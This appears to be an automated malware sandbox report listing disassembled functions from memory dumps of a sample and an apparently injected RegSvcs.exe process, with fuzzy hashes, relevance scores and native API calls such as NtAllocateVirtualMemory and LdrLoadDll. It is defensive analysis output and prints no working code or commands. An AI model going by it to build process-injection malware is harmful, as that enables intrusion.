Opcode Fuzzy Hash: 29ecbc5234d1a286c002c6e32989e2da6f3e736122139aedde3522325b692a03
Instruction Fuzzy Hash: 4B2180755093808FCB12CF24D594715BF71FB46214F28C5EED8498F6A7D33A940ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 025BD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669815448.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25bd000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 1b07fa8ab9936a4a08a678944e2d323b6df067c8c837ebba40f8754ece153d45
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 7211D376504280CFCB16CF14D5C4B56BF71FF84318F24C6A9D8490B656C33AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 025CD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669876939.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25cd000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 61b50defb6cb032571a4d4cd61b155bb2911bbdcc99f49aca08c50fdc8e8cb5f
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: F411BB76504280DFCB02CF50C9C4B15BFB1FB84218F24C6AED8498B29AC33AD40ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 025BD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669815448.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25bd000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53a7cd0839c81daadbb4e12f70580c70d30d50a5c89adcb09ef96b12fe05be7
Instruction ID: c4121562f29822b20d80918924f7530b096cde59a19c0a1368652569b2b7c33c
Opcode Fuzzy Hash: f53a7cd0839c81daadbb4e12f70580c70d30d50a5c89adcb09ef96b12fe05be7
Instruction Fuzzy Hash: 7901DB7110A3449AE7114B26CD847E7FFF8FF45324F18C96AED194A686C379D840C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 025BD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669815448.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25bd000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7b302e8906238a6a23692fd204465d2db0a16828922e350080df4106c20a719
Instruction ID: c9ed7583118779dd28abff1f8771bc00b432eb0faeae5ca93bed514fa3bcbcae
Opcode Fuzzy Hash: d7b302e8906238a6a23692fd204465d2db0a16828922e350080df4106c20a719
Instruction Fuzzy Hash: 10F0C272405344AEE7118B16CC84BA2FFA8FF41624F18C45AED080F286C3799840CAB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02732098 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

;LKq, xrefs: 0273229B

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID: ;LKq
API String ID: 0-1264649084
Opcode ID: 8f06ded20869498c0afc8c52162c2bc81e5c0efd54ebb190fef4f6fce36ed64f
Instruction ID: 18e0e3f1f10338f9483a079635239061bf7defa0f20a5ad021c25f98439d422d
Opcode Fuzzy Hash: 8f06ded20869498c0afc8c52162c2bc81e5c0efd54ebb190fef4f6fce36ed64f
Instruction Fuzzy Hash: BF713774E0524AEFCB05CF99D4809EEFBB1FB88310F14952AD915BB216D334AA46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 027343E0 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

@G, xrefs: 02734486

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID: @G
API String ID: 0-3362532384
Opcode ID: f7adb21c8bf28bfbf0d7fa558d0a15af00d52011295499dd834c842451481495
Instruction ID: 9963aeda5bda43db94a22d04e3035278ce07883bd54b2b99fa104d27ca943cc8
Opcode Fuzzy Hash: f7adb21c8bf28bfbf0d7fa558d0a15af00d52011295499dd834c842451481495
Instruction Fuzzy Hash: D471DE74E002199FCB49CFA9D49099EFBF1EF89320F14D56AE429AB325D734A942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 027343F0 Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

@G, xrefs: 02734486

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID: @G
API String ID: 0-3362532384
Opcode ID: d91c9d05a97e27eef76331c2f0e3e9d964cbba49baf8fe383abd5e372a4a3988
Instruction ID: ed5f8179adc02ea5a47b1a4395b396e42b5fcffdc64882ce9c8e23cd60c0cc7a
Opcode Fuzzy Hash: d91c9d05a97e27eef76331c2f0e3e9d964cbba49baf8fe383abd5e372a4a3988
Instruction Fuzzy Hash: 9C71BB74E012199FCB49CFA9D48499EFBF1FB88310F14D56AE829AB325D734A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 027355B3 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

@5M, xrefs: 0273561C

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID: @5M
API String ID: 0-4053365549
Opcode ID: 353c7c018440855a716dd29859693a9ed981f348b9844c151c24bfc4f34917d9
Instruction ID: 8aea40d0061419e72d1a4e62796c037af87fde61913d373506710f10c69cd09b
Opcode Fuzzy Hash: 353c7c018440855a716dd29859693a9ed981f348b9844c151c24bfc4f34917d9
Instruction Fuzzy Hash: 135112B4E0020ADFCB05CFAAD4815AEFBF2EB88304F64D46AC415B7215E7349A528F94

Uniqueness

Uniqueness Score: -1.00%

Function 02735BF8 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

]P=|, xrefs: 02735D7C

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID: ]P=|
API String ID: 0-1204048762
Opcode ID: a2c68d075d0cf396ee89486d49d672d1627f4b950938feeb5f50cd994b5e0b35
Instruction ID: 0426cb4ca3d553f5760c51715fcce0fe9b836002024fbed7013c3133c42a0ae4
Opcode Fuzzy Hash: a2c68d075d0cf396ee89486d49d672d1627f4b950938feeb5f50cd994b5e0b35
Instruction Fuzzy Hash: 91517971E006188BDB58CF6B895479EFBF3AFC9300F14C1BA950CA6225EB300A868F51

Uniqueness

Uniqueness Score: -1.00%

Function 027355C0 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

@5M, xrefs: 0273561C

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID: @5M
API String ID: 0-4053365549
Opcode ID: 954cfadbc3dd9a301d6ccf919df2b6cd1f266b81d562283d3ff4acdd6c3f94f8
Instruction ID: 14a5735cb1dd72bb4b3e800effb79dca58d45737eb3153f6107807c5be06fba6
Opcode Fuzzy Hash: 954cfadbc3dd9a301d6ccf919df2b6cd1f266b81d562283d3ff4acdd6c3f94f8
Instruction Fuzzy Hash: 5A41E4B4E0160ADFCB08CFAAD5815AEFBF2BF88304F64D46AC415B7255E7349A418F94

Uniqueness

Uniqueness Score: -1.00%

Function 04E589D8 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52f55be34e7ac6687cf9bedd56216ee0240e3704a2ae572cf818ef64992cacc
Instruction ID: 0171190da7aade0c1f14159063be3dae4070e5a4392efd5f972df01077366bea
Opcode Fuzzy Hash: f52f55be34e7ac6687cf9bedd56216ee0240e3704a2ae572cf818ef64992cacc
Instruction Fuzzy Hash: 3112B6B8D817468AE352DF25E85C1893BB2FB40319FD84B2DD2611B2E5D7BC216ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 09431EF7 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce06842b0a880fb020220723d5b6cf31708ba8165e8069e9b602088697605a29
Instruction ID: adc237b6cb399e247751590f8a01735def1fffd751415ac0631bbdbbc9663126
Opcode Fuzzy Hash: ce06842b0a880fb020220723d5b6cf31708ba8165e8069e9b602088697605a29
Instruction Fuzzy Hash: 4DD1E331C1065A9ACB01EFA4D954AD9B7B1FF95300F10C7AAE44A77620EF746AC5CF81

Uniqueness

Uniqueness Score: -1.00%

Function 04E5698C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7f203c8ed609a16370fae0dadf235528744d194a95b0aa1dd6031730e2ddaa
Instruction ID: ce9b06b8624c7b77f952762e4cdaa401ee451720e1744a94c8f07521aaa36c3e
Opcode Fuzzy Hash: 7a7f203c8ed609a16370fae0dadf235528744d194a95b0aa1dd6031730e2ddaa
Instruction Fuzzy Hash: 7CA19E32E00205CFCF06EFB5C9844DEBBB2FF85304B15956AE805AB265DB31E965CB50

Uniqueness

Uniqueness Score: -1.00%

Function 09431F08 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c57b00b599271e0c72069e64e18b27228749647a1a21284c7702e7ddce8b38d
Instruction ID: 01f54dd5e5d5e7edf93b0ac77384ff5ab8ec58a3606674b3279ae785c16c84d7
Opcode Fuzzy Hash: 5c57b00b599271e0c72069e64e18b27228749647a1a21284c7702e7ddce8b38d
Instruction Fuzzy Hash: 6DD1E231C1065A9ACB01EFA4D954AD9B7B1FF95300F10CBAAE40A77620EF746AC5CF81

Uniqueness

Uniqueness Score: -1.00%

Function 04E589C8 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a67fce71b16c25f86912064d7fcefc5802b963257def29bbb8312f7e5f494c
Instruction ID: ec2045a6291da3cc1f14973c991cbf7796f00585c4ed8d72263bc79ae5196a82
Opcode Fuzzy Hash: 03a67fce71b16c25f86912064d7fcefc5802b963257def29bbb8312f7e5f494c
Instruction Fuzzy Hash: D7C15EB8C807058BE312DF25E8581897BB2FB84315FD84B2DD1606B2E5DBBC216ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 027357D3 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6c02f6ffc8d192261904f4e61037b8a66bbd571ed99a8bc730d45beccd81f4
Instruction ID: 3b6f4dea6a248a05c26aa0e3ebe1b79ecf8fc9fca62d8d00d3b30f0121c4ecea
Opcode Fuzzy Hash: be6c02f6ffc8d192261904f4e61037b8a66bbd571ed99a8bc730d45beccd81f4
Instruction Fuzzy Hash: BC8102B4E1421A8FCB05CFA9C9859DEFBF2FF89310F64942AD405B7225D7349A41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 027357E0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f32e2cfe36ff8d2b96d4cfebcadc4eca2cab981f9506d675c5a476137cd2e87d
Instruction ID: 0e38879d5698fafb7a0db1df10ce917366af6cbb07872d3bbc478a91b122edf3
Opcode Fuzzy Hash: f32e2cfe36ff8d2b96d4cfebcadc4eca2cab981f9506d675c5a476137cd2e87d
Instruction Fuzzy Hash: 5671D2B4E152199FCB08CFA9C9859DEFBF2EF8C310F64942AD405B7214D7349A41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 02734F18 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1837c4dd3de9e2097356ceae7ceed062c1e5c47cf0d1bb9f4229db7250f4e5f0
Instruction ID: 09588a11e78f9f2769f16cbcce53bde8ff9cbc51ac4f617925fc2d1c88bb7830
Opcode Fuzzy Hash: 1837c4dd3de9e2097356ceae7ceed062c1e5c47cf0d1bb9f4229db7250f4e5f0
Instruction Fuzzy Hash: 0B71F1B4D0120ADFCB09CF99D5809AEFBB1BF89310F18945AD415BB316D734AA82CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02734F0B Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49b9578547b2224f394b0a3b0235e0f7b91b2931a26766f692c1f14673b2aff5
Instruction ID: 7dffa55a47fcc810a9e40cfaa46e1df5a372ec99a62ecf456d13d1313ad7c3bf
Opcode Fuzzy Hash: 49b9578547b2224f394b0a3b0235e0f7b91b2931a26766f692c1f14673b2aff5
Instruction Fuzzy Hash: 5C61F274D0520ADFCB09CFA9C5819AEFBB1BF89310F18945AD415FB216D334A982CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04E5B618 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 831291f7d6cf7f26d7ea1d4d8d62481de0ef5c80ac89a96694f641789313c537
Instruction ID: afadea18add1e95b89067096ba7e58c21149bec81f48425931c867c47740ebd9
Opcode Fuzzy Hash: 831291f7d6cf7f26d7ea1d4d8d62481de0ef5c80ac89a96694f641789313c537
Instruction Fuzzy Hash: 5841F0B4C05248AFCB01DFA9D984ADEFBF4BF4A314F14906AE814AB220D334A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02735A58 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c21ba5c68714dc55b5ef7f649951d77300209284ab72f6ec032b3e6e8a61a414
Instruction ID: f89b51ce5b0654405f1f60281432c82e603f5f4e44ac6fc04712dac595ae8e5e
Opcode Fuzzy Hash: c21ba5c68714dc55b5ef7f649951d77300209284ab72f6ec032b3e6e8a61a414
Instruction Fuzzy Hash: D341E3B0E0560A9FDB44CFAAC5805AEFBF2BB88300F64D16AC415B7305E7349A41DF99

Uniqueness

Uniqueness Score: -1.00%

Function 02735A50 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8164bb55c420a999d9990cb7f9ac785ffbb45e6a8789f31d351b242d50e8020d
Instruction ID: 190bef749b424175ad118ff732de9246780790c4c9543066d8d137bee48ba09f
Opcode Fuzzy Hash: 8164bb55c420a999d9990cb7f9ac785ffbb45e6a8789f31d351b242d50e8020d
Instruction Fuzzy Hash: 3B41E3B0E0160A9BDB44CFAAC5815EEFBF2BB88300F24C16AC415B7215E7305A41DF98

Uniqueness

Uniqueness Score: -1.00%

Function 04E59B4C Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 067387ea29cf9ff95c5d6dcf6962383455b66e631432c407ace1f22264d79e91
Instruction ID: 315cf99c4bbb3f064388d869308883d6b4fd69d71fa2a58352ed7b6ebe49d40a
Opcode Fuzzy Hash: 067387ea29cf9ff95c5d6dcf6962383455b66e631432c407ace1f22264d79e91
Instruction Fuzzy Hash: 68319BB4D01258AFCB14CF99D584ADEFBF1BB49314F20A42AE818B7320D374A945CF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 3848, Parent PID: 6372COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.8%
Total number of Nodes:	551
Total number of Limit Nodes:	64

Executed Functions

Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

bMA, xrefs: 0041A422, 0041A430
bMA, xrefs: 0041A43D, 0041A444
!JA, xrefs: 0041A41C, 0041A428

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A52C Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6499e8fa36d8993f79e5c8178206fbcd015763605b595464c285486d50662366
Instruction ID: 11312a3560ed96ce417ed1ca4fb8cb34436df2ac178403c73e4b79343ce43b1b
Opcode Fuzzy Hash: 6499e8fa36d8993f79e5c8178206fbcd015763605b595464c285486d50662366
Instruction Fuzzy Hash: A8F0F2B2200208ABCB14DF89CC91EAB77A9AF88754F158149BA1897241C634E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A47C Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
Instruction ID: 0494ff60b09d4fc21657d6c615b5019aa557bb466eed1ab501d89975e332403b
Opcode Fuzzy Hash: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
Instruction Fuzzy Hash: 84E01776600214ABD720EBD9CC85FE77B68EF48764F158499BA1CAB242C534FA118BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4

Uniqueness

Uniqueness Score: -1.00%

Function 01632B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632B6A

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfb913cfb9417f983b2bb24b09b4b1a6a97253413c51bc11673bfcbe18a03fa0
Instruction ID: f69ad049271d937c089985f5e00baab9da26ee3fbad2be2d97a993f78067156f
Opcode Fuzzy Hash: dfb913cfb9417f983b2bb24b09b4b1a6a97253413c51bc11673bfcbe18a03fa0
Instruction Fuzzy Hash: 2A90026120240003420575984814617400E97E0201B55C021E5014690EC56589D16225

Uniqueness

Uniqueness Score: -1.00%

Function 01632BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01632BFA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: baad2ee45fec99f89c1f0b00869d5e341baeaebf01d1f5317f5c9dc4539f74ad
Instruction ID: 9945024aacad91037ea4e9b381dedacf0d8c48f5a0ea48b7b58c368876baa23f
Opcode Fuzzy Hash: baad2ee45fec99f89c1f0b00869d5e341baeaebf01d1f5317f5c9dc4539f74ad
Instruction Fuzzy Hash: 5990023120140803D2807598480464B000997D1301F95C015A4025754ECA558B9977A1

